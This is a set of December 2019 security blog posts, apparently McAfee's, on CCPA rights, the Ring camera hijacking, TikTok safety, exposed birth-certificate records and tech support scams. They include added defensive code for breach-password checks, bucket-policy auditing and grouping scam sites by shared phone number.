What are users’ new rights under the CCPA? First, businesses are required to reveal the personal data that is collected, sold, or disclosed for their business purposes. This includes informing users what categories of data were collected and how their data will be used. Second, companies may not discriminate against a consumer who exercises their rights under the CCPA. Third, businesses must provide users access to their data. Fourth, companies are required to delete users’ data upon request (with some significant exceptions). This includes personal data that the company might have shared with a third party. Lastly, businesses must give users the ability to opt out of the sale of their data.

That all sounds beneficial for privacy-conscious consumers, but how exactly does the CCPA define personal information? The CCPA defines personal information as any information that identifies, relates to, describes, is capable of being associated with, or could be reasonably linked with a particular consumer or household. Some examples of this type of data include a real name, user name, email address, Social Security Number, passport number, property records, biometric data, and internet activity like browsing history or IP addresses.

So, how will the CCPA be rolled out, and what happens if a business violates it? The law takes effect on January 1, 2020, but enforcement by the California Attorney General does not begin until July 1, 2020. Under the statute, a business that violates the CCPA and fails to cure the violation within 30 days of being notified is liable for a civil penalty of up to $2,500 per violation, or up to $7,500 per intentional violation. Separately, if a business suffers a data breach that exposes personal information because it failed to maintain reasonable security, the affected California residents can sue for damages.

While California is the first large state to implement these privacy regulations in the U.S., it certainly won’t be the last. Other states have begun drafting similar bills and similar regulations will likely come into effect over the next few years; Congress also has some significant bills under consideration. As this legislation is rolled out, consumers need to be aware of their new rights to help them better protect their privacy.

Stay on top of the latest consumer and security news by following @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

2019 Recap: A Year to Remember https://www.mcafee.com/blogs/enterprise/2019-recap-a-year-to-remember/ https://www.mcafee.com/blogs/enterprise/2019-recap-a-year-to-remember/#comments Wed, 18 Dec 2019 16:00:50 +0000 /blogs/?p=97814

Working Even Harder To End the Cybersecurity Talent Shortage

The term “skills gap” is all too familiar to those in the cybersecurity industry. A recent ISACA survey found only 18% of respondents said they believed the cybersecurity skills gap will be mostly or entirely filled during the upcoming decade, while 81% said companies aren’t investing enough in the people skills needed to navigate technological change. The talent shortage, coupled with the increasing volume of threats and the changing cybercrime landscape, presents a problem which is only getting worse. One initiative that McAfee is investing heavily in is education, and in September of this year, we expanded our work as a founding partner of the new Master of Cybersecurity and Threat Intelligence at the University of Guelph.

A Strong Presence at RSA

During this year’s RSA conference, VP and Chief Technology Officer Steve Grobman and Chief Data Scientist Dr. Celeste Fralick took the main stage to discuss how the industry needs to think about artificial intelligence, its power, and the possible ways it can be used against us. Despite its tremendous potential, Fralick explained, “Most people don’t realize how fragile AI and machine learning can really be.” In closing, Grobman told RSA attendees, “We must embrace AI but never ignore its limitations. It’s just math. It’s fragile. And there is a cost to both false positives and false negatives.”

Uncovering Ransomware Resurgence

As detailed in our August Threat Report, our Advanced Threat Research discovered that new ransomware samples had increased 118% from Q1 to Q2. The most active ransomware families of the quarter appeared to be Dharma (also known as Crysis), GandCrab and Ryuk. Other notable ransomware families of the quarter include Anatova, which was exposed by our ATR team before it had the opportunity to spread broadly, and Scarab, a persistent and prevalent ransomware family with regularly discovered new variants.

We’ve also seen an increase in the number of victims that have given in to the extortion demands of attackers, often paying ransom demands of hundreds or thousands of dollars in order to restore their systems.

The Release of The Cybersecurity Playbook

In September, McAfee Chief Marketing Officer Allison Cerra released her latest book, The Cybersecurity Playbook, which draws from her experiences as CMO and incorporates straightforward assessments, adaptable action plans, and many current examples to provide practical recommendations for cybersecurity policies. The Cybersecurity Playbook is an invaluable guide to identifying security gaps, getting buy-in from the top, promoting effective daily security routines, and safeguarding vital resources. Strong cybersecurity is no longer the sole responsibility of IT departments, but that of every executive, manager, and employee—so Cerra’s book provides practical to-dos for those at every level.

ATR Findings Announced at Black Hat and DEFCON

At Black Hat and DEFCON, we announced the discovery of two major vulnerabilities in commonly deployed industrial and enterprise devices. The first is a zero-day vulnerability in a Delta building controller that would allow malicious actors to manipulate access control systems, boiler rooms, temperature control for critical systems and more. The second vulnerability we announced was a 10-year-old bug within an innocuous Avaya desk phone. These findings show that entry points for bad actors into sensitive industrial and corporate environments are both wide-ranging and easy to miss. As more and more devices are connected to the internet, businesses, manufacturers and end users must be increasingly vigilant.

12th Annual MPOWER Cybersecurity Summit

This year, we hosted MPOWER at the Aria in Las Vegas, where fellow security experts strategized, networked, and discovered the newest and most innovative ways to ward off advanced cyberattacks. In addition to the announcement of several new innovations, MPOWER also featured a number of key speakers, including Madeleine Albright, Colin Powell, and McAfee CEO Chris Young, who stressed the importance of time. Missed this year’s event? Take a look at our top 5 highlights.

Announcing MVISION Insights

Live from the MPOWER main stage, we announced MVISION Insights, which will help organizations move to an action-oriented, proactive security posture by pinpointing threats that matter, offering insights into the effectiveness of their defenses, and providing the ability to respond quickly and accurately to these threats. Security teams will soon be able to utilize the data gathered by McAfee from more than one billion sensors worldwide and correlate it with their own threat data. This will allow them to obtain the information needed to battle threats targeting their systems and data, while also preemptively preparing defenses against threats even before they are seen in their environments.

First Cybersecurity Company to Achieve Global Gender Pay Parity

In April, we announced that we had become the first cybersecurity company to achieve global gender pay parity. “By achieving gender pay parity at McAfee, we continue to live our values, build an inclusive culture, create better workplaces, and develop stronger communities. I’m honored to join companies beyond the world of cyber already striving towards pay parity, and I hope more will join us in reaching this milestone in equality,” said Chief Human Resources Officer Chatelle Lynch. Reinforcing our company’s commitment to building an inclusive workplace, we also released our first Inclusion and Diversity Report, highlighting our strategy and results in supporting and growing a diverse workforce.

Introducing Unified Cloud Edge

Also at MPOWER, we introduced Unified Cloud Edge, an industry-first initiative to address the security concerns of the cloud. By converging the capabilities of our award-winning MVISION Cloud, McAfee Web Gateway, and McAfee Data Loss Prevention offerings, all to be available through the MVISION ePolicy Orchestrator (ePO) platform, McAfee Unified Cloud Edge will enable a borderless IT environment. “The convergence of security solutions that traditionally have functioned independently will improve an organization’s security posture by creating security defenses that work cohesively to defend against attacks,” Rob Westervelt, research director at IDC, said. “But even more importantly, this convergence will help ease the burden of managing security and compliance across hybrid and multi-cloud environments, which is one of the most significant challenges enterprises face today.”

Threat Predictions for the Year Ahead

It’s been yet another eventful year for cyberattacks. Although there is still some time left for 2019, it’s time to look towards the new year and speculate what may be in store for the threatscape. Here are the top five threat predictions for 2020.

  1. Broader Deepfakes Capabilities for Less-Skilled Threat Actors
  2. Adversaries to Generate Deepfakes to Bypass Facial Recognition
  3. Ransomware Attacks to Morph into Two-Stage Extortion Campaigns
  4. Application Programming Interfaces (API) Will be Exposed as the Weakest Link Leading to Cloud-Native Threats
  5. DevSecOps Will Rise to Prominence as Growth in Containerized Workloads Causes Security Controls to ‘Shift Left’

For more details on our 2020 Threat Predictions, click here.

Cybercriminal Speaks With Child via Hacked Smart Camera: How You Can Stay Protected https://www.mcafee.com/blogs/consumer/consumer-threat-notices/hacked-smart-camera-how-you-can-stay-protected/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/hacked-smart-camera-how-you-can-stay-protected/#comments Tue, 17 Dec 2019 00:15:11 +0000 /blogs/?p=97810

IoT devices enter our homes out of ease and convenience, as the gadgets often optimize or streamline ordinary tasks — such as notifying us who’s at the front door or providing us home surveillance at the touch of a button. And though these devices are helpful, they also provide cybercriminals with a way to enter homes if the gadgets are left unprotected. As a matter of fact, it was reported just last week that a camera from Ring, a smart home security system, was hacked by a cybercriminal – who was able to speak directly to a child in her bedroom as a result.

So, what exactly happened? According to The Washington Post, a cybercriminal was able to get inside a family’s Ring system, specifically taking over the camera in the children’s bedroom. The crook then interacted with one of the family’s daughters via the camera’s two-way talk function, harassing her with taunts and negative statements.

Reports have stated that this attack was not the result of a breach or compromise of Ring’s own systems, but of reused credentials: the attacker logged in with a username and password the account owner had also used elsewhere. Unfortunately, this is common. Credentials leaked in large-scale breaches are sold or posted online, and because so many people reuse the same login across services, a password stolen from one site often opens accounts on others.

Now, this incident isn’t just isolated to Ring cameras, as it has been observed with some baby monitor manufacturers and is a growing trend. So, the next question is – what can users do to prevent themselves from experiencing a similar attack on their IoT devices? They can start by following these tips:

  • Change your passwords. Use a unique password for every account and device, and change any that you have reused; credential reuse is exactly what let the attacker into this family’s camera. A password manager can generate and store long, complex passwords so you don’t have to remember them, and if a password you use ever shows up in a breach, change it immediately.
  • Don’t share your account logins to give others access. Be stringent when it comes to sharing logins. While it can be tempting to share passwords to streaming services and social media, your personal login should remain personal.
  • Use the “two-factor” option on your connected device. Implementing two-factor authentication can help halt a cybercriminal in their tracks. That’s because two-factor authentication adds an extra layer of protection to a device, since it requires access to a mobile phone in addition to a user’s login information.
  • Keep your camera’s firmware up to date. Vulnerabilities in software do happen, and running the latest firmware version reduces the risk of being compromised through one.
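A device vendor or account service can stop the reused-password problem at signup rather than after the fact, by refusing any password that already appears in a breach corpus. The script below is an added example, not code from the original post: it implements the client side of the k-anonymity range check used by Have I Been Pwned’s Pwned Passwords API (only the first five hex characters of the password’s SHA-1 hash are sent; the full hash never leaves the client), with the network call replaced by a constructed response so it runs offline. The counts in that response are made up.

```python
"""Checking a password against a breach corpus without sending the password.

Added example, not code from the original post. It implements the client
side of the k-anonymity scheme used by Have I Been Pwned's Pwned Passwords
range API (https://api.pwnedpasswords.com/range/<first 5 hex chars of SHA-1>):
only the 5-character hash prefix leaves the client, and the server answers
with every suffix it knows for that prefix. The HTTP call is replaced by a
constructed response so the script runs offline.
"""
import hashlib


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(password: str) -> tuple:
    """Return (prefix, suffix): the 5 chars sent to the server and the 35 kept local."""
    digest = sha1_hex(password)
    return digest[:5], digest[5:]


def parse_range_response(body: str) -> dict:
    """Parse 'SUFFIX:COUNT' lines (CRLF-separated in the real API) into a dict."""
    seen = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        seen[suffix.upper()] = int(count)
    return seen


def breach_count(password: str, fetch_range) -> int:
    """How many times the password appears in the corpus (0 if never).

    fetch_range(prefix) must return the response body for that prefix; the
    comparison against the full hash happens here, on the client.
    """
    prefix, suffix = split_hash(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


# Constructed stand-in for the range API. SHA-1("password") is
# 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8, so its suffix is listed under
# prefix 5BAA6; the other suffixes and all counts are made up.
FAKE_RANGE = {
    "5BAA6": "\r\n".join([
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471",
        "F" * 35 + ":2",
        "0" * 35 + ":1",
    ]),
}


def fake_fetch_range(prefix: str) -> str:
    return FAKE_RANGE.get(prefix, "")


def password_is_acceptable(password: str, fetch_range=fake_fetch_range,
                           min_len: int = 12) -> bool:
    """Policy check a signup form could run: long enough and never seen in a breach."""
    return len(password) >= min_len and breach_count(password, fetch_range) == 0


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        print(repr(pw), "seen", breach_count(pw, fake_fetch_range), "times")
```

To use the real service, `fetch_range` would fetch `https://api.pwnedpasswords.com/range/<prefix>` over HTTPS (sending the `Add-Padding: true` header so response sizes do not leak which prefix was queried) and return the body text; everything else, including the decision, stays as written.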

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Parents: You May Want to Pay Closer Attention to the TikTok App https://www.mcafee.com/blogs/consumer/family-safety/parents-you-may-want-to-pay-closer-attention-to-the-tiktok-app/ https://www.mcafee.com/blogs/consumer/family-safety/parents-you-may-want-to-pay-closer-attention-to-the-tiktok-app/#respond Sat, 14 Dec 2019 15:00:25 +0000 /blogs/?p=97792 TikTok risky app


You aren’t imagining things. Everyone is talking about the popular video-sharing app TikTok. That’s because it has simultaneously become both a source of entertainment for kids as well as a source of concern for some adults.

The social network, owned by Chinese parent company ByteDance, recently reached 750 million downloads, pushing its popularity ahead of Facebook, Instagram, YouTube, and Snapchat.

But while kids are busy creating and consuming short TikTok videos, a concerned community of parents, app users, and lawmakers are taking the app to the mat with allegations of censorship, misuse of data, and unlawful foreign influence. Just this week TikTok moderators admitted to limiting the content reach of users with disabilities deeming them “highly vulnerable to cyberbullying,” a policy approach that sorely misfired.

Next steps

Download TikTok. Simply hoping your child is behaving and steering clear of online danger zones, is not an effective safety strategy. At times it’s best to roll up your sleeves and get in the game. You don’t need to create a profile to browse public TikTok accounts and get a feel for the app’s content and various audiences. The interface is similar to Instagram so using the search bar to type in a hashtag or tapping the familiar “discover” button will expose you to a variety of content. You can also browse trending TikTok videos from your laptop, here.

Understand how your child uses TikTok. You can do this by creating a TikTok account and following your child’s account or by hanging out and watching your child create content, comment on videos, or interact with friends. You can even join in and make a video together. Depending on the age of your child and your rapport, this is the moment you may get accused of being creepy, hovering, or stalking. Don’t sweat it. Ignore the sighs, huffs, and protests. Understanding your child’s digital habits and app use is part of being a parent today — so press on!

Get real about the risks. Don’t allow the fun, creative, and entertaining elements of the app (it is definitely an endless well of funny, clever content) overshadow the potential dangers such as cyberbullying, inappropriate content, explicit lyrics, potential predators, and possible privacy issues.

Read the reviews. The app reviews on Google Play or the App Store can be biased. A better source for objective reviews from both kids and parents can be found at Common Sense Media. Reading reviews can save you time (and heartache) by shedding light on lesser-known risks you need to discuss as a family.

5 TikTok safety basics

If you’ve weighed the pros and cons and decide your child can safely maintain an active TikTok account, here are some safety basics to consider:

  1. Require your child to keep his or her TikTok account private (monitor to make sure it stays private). Change the settings for comments, duets, reactions, and messages to “friends” instead of “everyone.”
  2. Monitor Direct Messages and Comments since these are the most common ways strangers initiate contact with minors.
  3. Discuss how to respond to potential cyberbullying, inappropriate comments, or strangers who attempt to connect. Be sure your child knows where to report issues.
  4. Adhere to age restrictions. Point younger users to the “under 13” section of the app that restricts access to mature content.
  5. Use TikTok’s new Family Safety mode, which allows a parent to link their TikTok account to their child’s so they can easily monitor content and connections.

Anytime there’s creativity, laughter, and a strong community forming online, it doesn’t take long for the shady side of humanity to show up and try to ruin the fun. By staying on top of app trends and getting involved on the front lines, parents can offer guidance and influence to their kids when they need it most.

750K Birth Certificate Applications Exposed Online: 5 Tips to Help You Stay Secure https://www.mcafee.com/blogs/consumer/consumer-threat-notices/750k-birth-certificate-applications-exposed/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/750k-birth-certificate-applications-exposed/#respond Thu, 12 Dec 2019 22:53:11 +0000 /blogs/?p=97788

Most people applying for birth certificates aren’t thinking that their private information will be made readily available to the public. But according to TechCrunch, an online company that allows users to obtain a copy of their loved one’s birth and death certificates from U.S. state governments has exposed over 752,000 applications for copies of birth certificates and 90,400 death certificate applications.

Although the application process differed by state, all of them let customers apply to their state’s record-keeping authority through the company’s site. The applications contained personally identifiable information such as the applicant’s name, date of birth, current home address, and more. What’s more, the applications, which sat in a publicly accessible online storage bucket, dated back to late 2017 and were being added to daily, creating a growing treasure trove for cybercriminals.
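The post says only that the applications sat in an online bucket, so the check below is an added example rather than anything from the post or the company involved. It assumes an AWS S3-style bucket policy document and audits it the way a cloud-posture scan would: any Allow statement with an anonymous principal and a read action is public, and one that carries a Condition is flagged for review rather than declared public. The policy, bucket name and account ID are constructed so the script runs offline.

```python
"""Flagging a storage-bucket policy that lets anyone read the objects.

Added example, not code from the original post. The post only says the
applications sat in an "online bucket"; this example assumes an AWS S3-style
bucket policy (JSON) and audits it the way a cloud-posture scan would, on a
constructed policy so it runs offline. In practice the document comes from
`aws s3api get-bucket-policy --bucket <name>`; the bucket ACL and the account's
Block Public Access settings need the same review.
"""
import json

# Actions that expose object contents or the object listing.
READ_ACTIONS = {"s3:listbucket", "s3:*", "*"}


def is_read_action(action: str) -> bool:
    a = action.lower()
    return a in READ_ACTIONS or a.startswith("s3:get")


def principals(stmt: dict) -> list:
    """Normalise Principal to a list of strings; '*' means anonymous."""
    p = stmt.get("Principal", {})
    if p == "*":
        return ["*"]
    if isinstance(p, dict):
        aws = p.get("AWS", [])
        return [aws] if isinstance(aws, str) else list(aws)
    return []


def actions(stmt: dict) -> list:
    a = stmt.get("Action", [])
    return [a] if isinstance(a, str) else list(a)


def audit_policy(policy_json: str) -> dict:
    """Return {'public': [...], 'review': [...]} keyed by statement Sid.

    public: Allow + anonymous principal + read action + no Condition.
    review: same but with a Condition (e.g. aws:SourceIp), which may or may
            not actually restrict who can read; a human should look.
    """
    policy = json.loads(policy_json)
    result = {"public": [], "review": []}
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" not in principals(stmt):
            continue
        if not any(is_read_action(a) for a in actions(stmt)):
            continue
        sid = stmt.get("Sid", f"statement[{i}]")
        result["review" if stmt.get("Condition") else "public"].append(sid)
    return result


def remove_public_statements(policy_json: str) -> str:
    """Hardened copy of the policy with the unconditional public-read grants dropped."""
    policy = json.loads(policy_json)
    public = set(audit_policy(policy_json)["public"])
    policy["Statement"] = [
        s for i, s in enumerate(policy.get("Statement", []))
        if s.get("Sid", f"statement[{i}]") not in public
    ]
    return json.dumps(policy, indent=2)


# Constructed policy: one open grant, one scoped by source IP, one for a role.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-applications/*"},
        {"Sid": "OfficeOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-applications",
                      "arn:aws:s3:::example-applications/*"],
         "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
        {"Sid": "AppRole", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/app"},
         "Action": "s3:PutObject",
         "Resource": "arn:aws:s3:::example-applications/*"},
    ],
})

if __name__ == "__main__":
    print(audit_policy(SAMPLE_POLICY))
    print(remove_public_statements(SAMPLE_POLICY))
```

Removing the public statement is necessary but not sufficient: a bucket can also be opened through its ACL, and objects can be shared individually, so the account-level Block Public Access switch is the control that actually prevents this class of exposure from recurring.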

Due to the high amount of consumer data provided by people requesting copies of birth certificates or registering their newborn children, the exposure of these applications is a cybercriminal’s dream come true. If a criminal did get a hold of this information, the information would likely be posted for sale on the Dark Web. From there, other malicious actors could purchase the data and use it to impersonate others or commit identity theft.

TechCrunch and the security researchers who discovered the exposed data attempted to inform the company responsible but have not yet received a response. So, in the meantime, here are some steps users can follow to help protect their personal information now and in the future:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Watch out for other cyberattacks. Be on high alert for malicious attacks where cybercriminals could use stolen credentials to exploit users, such as spear phishing.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Top Tips to Spot Tech Support Scams https://www.mcafee.com/blogs/other-blogs/mcafee-labs/top-tips-to-spot-tech-support-scams/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/top-tips-to-spot-tech-support-scams/#respond Thu, 12 Dec 2019 16:35:48 +0000 /blogs/?p=97697

Scammers use a number of methods to go after your money or personal details. These scams include fake support sites for services such as Office365, iCloud and Gmail that charge you for “support” and steal your credit card details in the process. Software activation scam sites steal your activation code, which they may then resell at a low price.

There have been many articles about these types of scams, including one we posted earlier this year about support scams – https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam.

In this article, we would like to provide more examples of the scam sites and tips to help you spot them and avoid entering your personal information.

Scam sites may include these major services’ names in their domains, and include links to the official sites, so that they appear to be legitimate (authorized) support for these companies.

The screenshots below are examples of various types of scam sites.

The first is an example of a software activation scam site. It targets users who are confused about how to set up their software. As shown below, the scammer asks users to enter their personal information and the activation key, pretending to help with the software setup.

On the same page, it provides the details on how to find the activation key and how to set up the software.

After following these steps and entering the personal information, you get an error, as shown in the screenshot below.

At this point, the scammer has already received the user’s information, which could then be used for financial gain. Once the error occurs, they expect the user to call the numbers shown above, and they will charge the user for that call, even though the user can get the same service for free from the respective software companies. The activation code can then be sold at a low cost on pirated software sites.

When you encounter a site that you suspect to be a support scam, try Googling its phone number. You may be surprised to find many other support scam sites with the same phone number in the results. In this example, the same number is linked to at least 4 other support scams.

These sites all have the same appearance, as shown in the screenshot below.

The below screenshot shows a typical scam site that tries to mimic the official site but is not as professional. It only provides the phone number and contact form, and nothing else.
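The phone-number pivot described above can be turned into a simple defender-side check: normalize the numbers advertised on a set of suspected pages, group the hosts that share one, and note hosts that embed an impersonated brand name. This is an added example, not code from the article; all page text, hosts, numbers and brand keywords in it are constructed placeholders, not the article’s indicators.

```python
"""Defender-side pivot on the phone numbers advertised by suspected support-scam pages.

Added example (not code from the article): normalise every phone number found in
page text, then group the hosts that advertise the same number, and note hosts that
embed an impersonated brand name. All page text, hosts and numbers below are
constructed placeholders, not the indicators from the article.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample pages: URL -> visible page text (placeholder data).
SAMPLE_PAGES = {
    "https://brandname-setup.example/": "Call us now: 1-800-555-0100 for activation help",
    "https://brandname-activate.example/help": "Support line (800) 555-0100. Enter your product key",
    "https://printer-setup-help.example/": "Toll free: 800.555.0100",
    "https://www.examplecorp.example/support": "Contact support at 1-800-555-0199",
    "https://another-activate.example/": "Helpline +1 800 555 0100, available 24x7",
}

# Hosts known to be the genuine vendor sites (placeholder).
OFFICIAL_HOSTS = {"examplecorp.example"}

# Brand keywords that scam domains tend to embed (placeholders for real brand names).
BRAND_KEYWORDS = ("brandname", "examplecorp")

# North American numbers in the common written forms: 1-800-555-0100, (800) 555-0100,
# 800.555.0100, +1 800 555 0100. Captures area code, exchange and line number.
PHONE_RE = re.compile(r"(?:\+?1[\s.-]*)?\(?(\d{3})\)?[\s.-]*(\d{3})[\s.-]*(\d{4})")


def extract_phone_numbers(text):
    """Return the distinct numbers in text, normalised to 10 digits and sorted."""
    return sorted({"".join(groups) for groups in PHONE_RE.findall(text)})


def registrable_host(url):
    """Host name of url with a leading 'www.' stripped, so variants group together."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def cluster_by_phone(pages):
    """Map each normalised phone number to the set of hosts advertising it."""
    index = defaultdict(set)
    for url, text in pages.items():
        host = registrable_host(url)
        for number in extract_phone_numbers(text):
            index[number].add(host)
    return index


def suspicious_clusters(pages, min_hosts=2):
    """Numbers advertised by at least min_hosts distinct hosts (the article's pivot)."""
    return {number: sorted(hosts)
            for number, hosts in cluster_by_phone(pages).items()
            if len(hosts) >= min_hosts}


def brand_in_host(host, official_hosts=OFFICIAL_HOSTS, keywords=BRAND_KEYWORDS):
    """True when a host that is not an official site embeds a brand keyword."""
    if host in official_hosts:
        return False
    return any(keyword in host for keyword in keywords)


def flag_hosts(pages, official_hosts=OFFICIAL_HOSTS, min_hosts=2):
    """Per host, the indicators observed: shared phone number, brand name in domain."""
    shared = suspicious_clusters(pages, min_hosts)
    findings = defaultdict(list)
    for url in pages:
        host = registrable_host(url)
        for number, hosts in shared.items():
            if host in hosts:
                findings[host].append(
                    f"phone {number} shared with {len(hosts) - 1} other host(s)")
        if brand_in_host(host, official_hosts):
            findings[host].append("impersonated brand name in domain")
    return dict(findings)


if __name__ == "__main__":
    for host, reasons in sorted(flag_hosts(SAMPLE_PAGES).items()):
        print(host, "->", "; ".join(reasons))
```

Hosts that share a number with several others, or that carry a vendor’s name without being the vendor’s site, are the ones worth submitting for review rather than calling.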

Users may encounter these sites in various ways:

  • By clicking on links from unsolicited emails.
  • From pop-up ads from risky sites such as illegal movie streams.
  • Ad campaign pop-ups from otherwise legitimate sites that have had malicious ads injected or not thoroughly vetted.
  • Advertised in online classified ads, forum posts and blog sites.
  • Advertised in Social media sites such as Facebook, Reddit, YouTube and Tumblr.

One way to be sure that you have the correct contact information is to get it from the legitimate website. When you search for the contact information, always make sure that the search result shows the link to the respective organization. Be aware that it may not always appear at the top of your search results.

When you click the link in the search result, make sure that you land on the expected site.

Advice to Consumers:

Online users should be careful about where they seek technical support and activation help.

Consumers should be aware that these companies will not send unsolicited email messages or make unsolicited phone calls requesting users’ personal or financial information in order to offer technical support to fix their computer or to set up activation.

As highlighted in this blog, a user will often be presented with a fake error screen to be tricked into calling a premium rate phone number. Warnings or error messages from legitimate companies never include their phone numbers.

Users do not have to pay for a service that they can get directly from the respective companies for free. Also, software companies will never ask you to pay with Bitcoin or gift cards. Users should only use the official website and, if unsure, contact the company through the official website’s contact form.

These tech support domains may be registered in various countries. Their lifespan may be short, like a year or two; for the examples listed in this article, the average domain life cycle was 2.1 years. They mimic the look and feel of the official websites by copying the logo and other graphics, but they are often not quite as professional looking as the official ones.

If you find suspected scam sites, please submit them to McAfee for review at https://trustedsource.org as well as reporting to your local law enforcement.

The URLs discovered and analyzed for this article are covered by WebAdvisor.


The post Top Tips to Spot Tech Support Scams appeared first on McAfee Blogs.

DOTGOV Online Trust in Government Legislation is Critical to Improving Election Security https://www.mcafee.com/blogs/other-blogs/executive-perspectives/dotgov-online-trust-in-government-legislation-is-critical-to-improving-election-security/ https://www.mcafee.com/blogs/other-blogs/executive-perspectives/dotgov-online-trust-in-government-legislation-is-critical-to-improving-election-security/#respond Tue, 10 Dec 2019 16:00:44 +0000 /blogs/?p=97777

In November, the Senate Homeland Security Committee approved the bipartisan DOTGOV Online Trust in Government Act of 2019 (S. 2749), legislation introduced by Senators Gary Peters (D-MI), Ron Johnson (R-WI), Amy Klobuchar (D-MN) and James Lankford (R-OK) to help state and local governments transition to a .gov domain. The program is funded through the Department of Homeland Security’s (DHS) Homeland Security Grant Program and is a key step toward improving cybersecurity and making it easier for citizens and businesses to differentiate between legitimate websites and ones set up by bad actors. With the 2020 elections fast approaching, it is more important than ever that state and local governments transition to government validated web domains to avoid election tampering and disinformation.

The security of elections depends on solid election infrastructure and sound cybersecurity practices. An attack on the U.S. election infrastructure does not require hacking physical voting machines or tampering with ballots. Instead, attackers can use disinformation campaigns that focus on vulnerable gaps at the county and state levels, where many constituents get information online from their local election boards.

Last year, McAfee released research on the security of election infrastructure at the individual county and state levels. The research revealed that the majority of local county government and county election board websites were using poorly validated domain names using .com, .net and .us, rather than government validated .gov domain names, which must pass a U.S. federal government validation process.

Bad actors looking to tilt an election outcome can easily set up fraudulent local election sites using the easier-to-obtain domain names and spread disinformation about polling locations or voting procedures through bogus email addresses. McAfee’s research into this issue since the 2018 midterm elections suggests that the lack of .gov usage could be a critical election security gap in states likely to be highly contested in the upcoming 2020 presidential election.

At McAfee, we believe that DHS should work closely with local governments to enable the widespread adoption of .gov domain environments. The DOTGOV Online Trust in Government Act is critical to protecting local and state governments from bad actors and encouraging states and localities to adopt a validated .gov domain. The provision in the legislation that enables states and local governments to leverage DHS grants to support their adoption of .gov domains makes a great deal of sense and needs to be funded in the President’s next budget.

The countdown to the 2020 elections is underway, and disinformation remains a top concern for election officials and lawmakers. DHS must ensure that government-validated election sites are easily identifiable by the public through increased use of .gov domains. This transition is a pivotal and necessary step toward improving the security of our election infrastructure.

The post DOTGOV Online Trust in Government Legislation is Critical to Improving Election Security appeared first on McAfee Blogs.

Independent Research Firm Ranks CWS Vendors in Report: McAfee a Leader https://www.mcafee.com/blogs/enterprise/cloud-security/independent-research-firm-ranks-cws-vendors-in-report-mcafee-a-leader/ https://www.mcafee.com/blogs/enterprise/cloud-security/independent-research-firm-ranks-cws-vendors-in-report-mcafee-a-leader/#respond Mon, 09 Dec 2019 19:19:21 +0000 /blogs/?p=97764

Forrester, a leading independent research firm in the field of cybersecurity, recently published its inaugural WAVE report on Cloud Workload Security. We’re proud to report that McAfee was named a leader.

The Forrester Wave evaluates and ranks products in the CWS category against 30 pre-defined criteria. The report provides security leaders with evaluations of the 13 providers that matter most and how they stack up. Forrester conducted a detailed technical evaluation of each product, as well as an analysis of each provider’s market presence and strategy. In its findings, Forrester said that support for containerization and OS-level protection were key differentiators. Forrester also says, “Vendors that can provide cloud and on-premises-based CWS solutions position themselves to successfully deliver comprehensive cloud workload protection and posture management to their customers.” Download your complimentary copy here.

In this first CWS Wave report, authored by Forrester Vice President, Principal Analyst Andras Cser with Merritt Maxim, Matthew Flug, and Peggy Dostie, McAfee is designated a leader. McAfee Cloud Workload Security (CWS) and MVISION Cloud Security contributed to McAfee receiving the highest score possible in the categories of:

Current offering:

  • Operating system-level workload protection
  • Users and roles
  • API-level connectivity and control for IaaS and PaaS
  • Hypervisor protection

Strategy:

  • Centralized agent framework plans
  • API control for IaaS and PaaS plans
  • Hypervisor protection plans
  • Threat detection and auditing plans
  • Services and partners
  • Sales staffing
  • Support staffing
  • Pricing terms and flexibility

McAfee was recognized for its coverage of guest OS and API platforms; for McAfee ePolicy Orchestrator, which offers comprehensive and centralized control of CWS policies; for comprehensive memory integrity monitoring; for DLP scans of AWS S3 buckets and Azure blobs for sensitive information; and for automatic warning of vulnerabilities based on fingerprinting known-good container images. McAfee was the only vendor to score a 5 out of 5 in the Threat Detection and Auditing plans criterion.

Evaluation Summary

